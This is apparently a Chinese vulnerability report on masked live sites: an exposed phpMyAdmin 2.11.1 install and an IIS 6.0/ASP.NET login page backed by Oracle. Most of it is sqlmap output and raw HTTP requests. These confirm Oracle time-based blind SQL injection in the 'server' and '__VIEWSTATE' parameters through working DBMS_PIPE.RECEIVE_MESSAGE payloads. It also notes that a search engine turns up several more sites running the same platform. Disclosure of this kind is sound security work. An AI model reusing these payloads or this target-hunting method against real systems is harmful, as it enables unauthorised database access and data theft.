phpmyadmin 地址泄露 http://**.**.**.**/db/index.php 版本是2.11.1 注入点:"http://**.**.**.**/db/index.php?lang=zh-gb2312&co nvcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=2cf2e60511edfbfd d010d7be7ad32f33"
POST data: pma_username=&pma_password=&server=1&lang=zh-gb2312&convcharset=iso-8 859-1 do you want to test this form? [Y/n/q] > y Edit POST data [default: pma_username=&pma_password=&server=1&lang=zh-gb2312&con vcharset=iso-8859-1] (Warning: blank fields detected): do you want to fill blank fields with random values? [Y/n] n [15:44:44] [INFO] using 'C:\sqlmap\output\**.**.**.**\session' as session file [15:44:44] [INFO] resuming injection data from session file [15:44:44] [INFO] resuming back-end DBMS 'oracle' from session file sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: POST Parameter: server Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: collation_connection=utf8_unicode_ci&convcharset=iso-8859-1&server= 1) AND 9468=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(111)||CHR(117)||CHR(74),5) AN D (6861=6861&lang=zh-gb2312 --- do you want to exploit this SQL injection? [Y/n] y [15:44:47] [INFO] the back-end DBMS is Oracle web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0 back-end DBMS: Oracle
第二个注入站点:http://**.**.**.**/IPhone4/Login.aspx
POST /IPhone4/Login.aspx HTTP/1.1 Host: **.**.**.** Content-Length: 369 Cache-Control: max-age=0 Origin: http://**.**.**.** Upgrade-Insecure-Requests: 1 Referer: http://**.**.**.**/IPhone4/Login.aspx Accept-Encoding: gzip, deflate __VIEWSTATE=%2FwEPDwUKLTExMDcwNDM4OA9kFgJmD2QWAgIDDw9kFgIeCG9uY2hhbmdlBRNBbnRpU3FsVmFsaWQodGhpcyk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FDEltYWdlQnV0dG9uMftaawGQ1UcrtskTl0Mslv1yonr%2F&__EVENTVALIDATION=%2FwEWBQLJxePqBwKj1dLzBwKC3IeGDALG8eCkDwLSwpnTCDbU6RHeNSzhZgnLugzDGGYJjnfo&txtUserCode=13888888888&btnLogin.x=37&btnLogin.y=23&txtUserPwd=6666
Cache-Control → private, max-age=10800, pre-check=10800 Connection → close Content-Type → text/html; charset=gb2312 Date → Sun, 10 Jan 2016 14:24:30 GMT Expires → Thu, 19 Nov 1981 08:52:00 GMT Last-Modified → Thu, 20 Sep 2007 16:35:26 GMT Server → Microsoft-IIS/6.0 X-Powered-By → ASP.NET
Title: Oracle AND time-based blind Payload: __VIEWSTATE=/wEPDwUKLTExMDcwNDM4OA9kFgJmD2QWAgIDDw9kFgIeCG9uY2hhbmd lBRNBbnRpU3FsVmFsaWQodGhpcyk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgU IYnRuTG9naW4FDEltYWdlQnV0dG9uMftaawGQ1UcrtskTl0Mslv1yonr/') AND 4326=DBMS_PIPE.R ECEIVE_MESSAGE(CHR(117)||CHR(104)||CHR(88)||CHR(90),5) AND ('JHjr'='JHjr&__EVENT VALIDATION=/wEWBQLJxePqBwKj1dLzBwKC3IeGDALG8eCkDwLSwpnTCDbU6RHeNSzhZgnLugzDGGYJj nfo&txtUserCode=&btnLogin.x=1&btnLogin.y=1&txtUserPwd= ---
通过搜索引擎联合查询,发现 移动办公申报平台 都有多个站点
Test parameter: __VIEWSTATE Host IP: **.**.**.** Web Server: Microsoft-IIS/6.0 Powered-by: ASP.NET I guess injection type is Integer?! If injection failed, retry with a manual keyword. DB Server: Oracle Page Found: http://**.**.**.**/login.html N